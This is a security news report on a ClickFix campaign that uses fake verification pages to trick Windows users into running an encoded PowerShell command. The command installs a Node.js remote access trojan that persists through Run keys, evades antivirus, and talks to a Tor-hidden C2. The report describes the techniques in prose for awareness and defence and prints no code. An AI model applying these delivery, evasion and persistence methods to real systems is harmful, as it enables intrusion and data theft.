ClickFix Lure Drops Node.js Windows RAT with Tor Hackers Node.js-Based

A new wave of cyberattacks is targeting Windows users, deploying a Node.js-based Remote Access Trojan (RAT) through a social engineering technique dubbed ClickFix. Attackers trick victims with a fake browser verification page, coercing them into executing a hidden command that quietly installs the RAT onto their systems.

The malware then communicates with its operators through the Tor network, masking its traffic and making the attacker’s infrastructure nearly impossible to trace or shut down.

ClickFix first emerged as a notable delivery method in early 2025, when threat actors used it to push well-known malware families such as LegionLoader and LummaStealer onto victim machines.

The technique works by displaying a fake CAPTCHA or identity check page, then instructing the user to manually copy and run a command from their clipboard.

In this latest campaign, that command executes a base64-encoded PowerShell script that downloads a malicious installer file, NodeServer-Setup-Full.msi, from a fraudulent domain and installs it silently in the background without displaying any visible prompts.

Researchers at Netskope Threat Labs identified and tracked this campaign, noting that it stands clearly apart from earlier ClickFix operations due to its more sophisticated overall design.

The RAT is built on a modular Node.js framework, meaning its most dangerous capabilities are never stored on the victim’s hard drive. They are delivered entirely in memory only after the malware establishes a successful connection to its command-and-control server, which allows it to sidestep traditional security scans with relative ease.

What makes this campaign particularly alarming is the criminal infrastructure supporting it. The attackers built a Malware-as-a-Service platform that multiple operators can access and deploy against their own sets of victims.

An operational security mistake by the threat actors accidentally exposed the server-side admin panel, which revealed features for tracking cryptocurrency wallets, managing multiple operators with role-based access controls, pushing custom modules to infected machines, and sending real-time Telegram alerts whenever a new victim connects.

The malware also builds a thorough profile of each compromised machine, collecting the operating system version, hardware details, geographic location, external IP address, and a full list of security tools currently running on the system. This fingerprinting step helps operators decide which victims are worth pursuing further.

The malware actively checks for more than 30 antivirus and endpoint security products, including CrowdStrike, Kaspersky, SentinelOne, and Windows Defender.

How the Infection Persists and Communicates

Once the MSI installer runs, the malware extracts its files into the %LOCALAPPDATA%LogicOptimizer folder and registers a persistence entry under the Windows Registry Run key, so it starts automatically each time the user logs in.

It uses conhost.exe in headless mode to silently launch Node.js, keeping the entire process invisible to the user. This approach avoids any taskbar or window alerts that could raise suspicion and reveal the infection.

Before connecting to its C2 server, the malware runs through multiple layers of decryption using AES-256-CBC and XOR methods to uncover its full configuration data.

The encryption keys are also reshuffled on every execution, which prevents analysts from reverse-engineering the config through static methods. Once decrypted, the configuration reveals a .onion Tor hidden service address as the C2 server destination.

To reach that server, the malware downloads the Tor Expert Bundle directly from the official Tor Project website and creates a SOCKS5 proxy on the local machine.

It then connects using gRPC, a streaming protocol that allows real-time two-way communication between the infected machine and the C2 operator.

All theft modules and commands are pushed from the server as JavaScript strings, executed in a Node.js sandbox in memory, and never written to disk. A built-in watchdog process monitors the connection and automatically restarts it if it drops.

Security teams should monitor endpoints for unexpected Node.js or conhost.exe processes, unusual Tor traffic on the network, and any new entries added under Registry Run keys.

Organizations should also block outbound connections to .onion domains and flag any MSI files silently downloaded through PowerShell.

User awareness training remains critical, as ClickFix attacks rely entirely on tricking individuals into running commands they do not understand.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.